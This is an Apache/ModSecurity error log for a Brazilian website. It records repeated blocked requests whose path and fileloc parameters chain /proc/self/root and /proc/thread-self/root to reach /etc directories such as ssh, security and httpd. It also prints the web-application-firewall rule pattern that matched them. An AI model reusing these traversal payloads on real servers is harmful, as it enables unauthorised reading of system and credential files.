[Tue Mar 17 15:17:35.184419 2026] [:error] [pid 9299:tid 140411632822016] [client 74.7.243.128:44672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmav7-sgTmmJoPuMdy9-wAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:39.439192 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:47608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaw7-sgTmmJoPuMdy9_gAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:42.217275 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:52270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmaxtY0UrI5A3LftIwEcAAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:17:45.036912 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:52286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmayfPqhzTj3BvfDX-PRgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:17:56.133253 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54902] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:18:18.069817 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:18:23.787049 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:43064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abma73Ik7brgkOH-rIWTSAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:18:25.751559 2026] [:error] [pid 18380:tid 140411582465792] [client 74.7.244.43:44238] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abma8a4xEDsg_V3ESNZTzgAAAhM"]
[Tue Mar 17 15:18:39.121816 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56052] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:18:42.363022 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.228.61:52670] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmbAsU6Sx0TG1YjmQi2wAAAApM"]
[Tue Mar 17 15:18:46.666771 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:49978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbBtY0UrI5A3LftIwEiwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:19:01.125787 2026] [proxy_fcgi:error] [pid 6296:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:19:24.057834 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:19:46.124417 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57494] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:20:08.149038 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57938] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:20:20.625268 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.241.31:40684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbZL-sgTmmJoPuMdy-RAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:30.098288 2026] [proxy_fcgi:error] [pid 7437:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58404] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:20:35.476514 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:56648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbcxj0p0SRWAqcjGGBQQAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:36.171426 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:56648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbdBj0p0SRWAqcjGGBQgAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:39.728543 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:58208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbd8U6Sx0TG1YjmQi3AAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:44.128020 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:58210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbfBj0p0SRWAqcjGGBRQAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:48.395698 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:58214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbgMU6Sx0TG1YjmQi3BgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:50.084582 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:49510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbgsU6Sx0TG1YjmQi3CAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:51.442047 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:49520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbg8U6Sx0TG1YjmQi3CgAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:53.126332 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:20:53.193554 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:49530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbhcU6Sx0TG1YjmQi3DgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:55.411216 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:49534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbh8U6Sx0TG1YjmQi3EAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:20:59.333966 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:56084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbi_PqhzTj3BvfDX-PlgAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:08.439234 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:56094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmblKt8Nd0UC_OcbVHSJwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:21:11.004501 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:42392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmbl3Ik7brgkOH-rIWTeAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
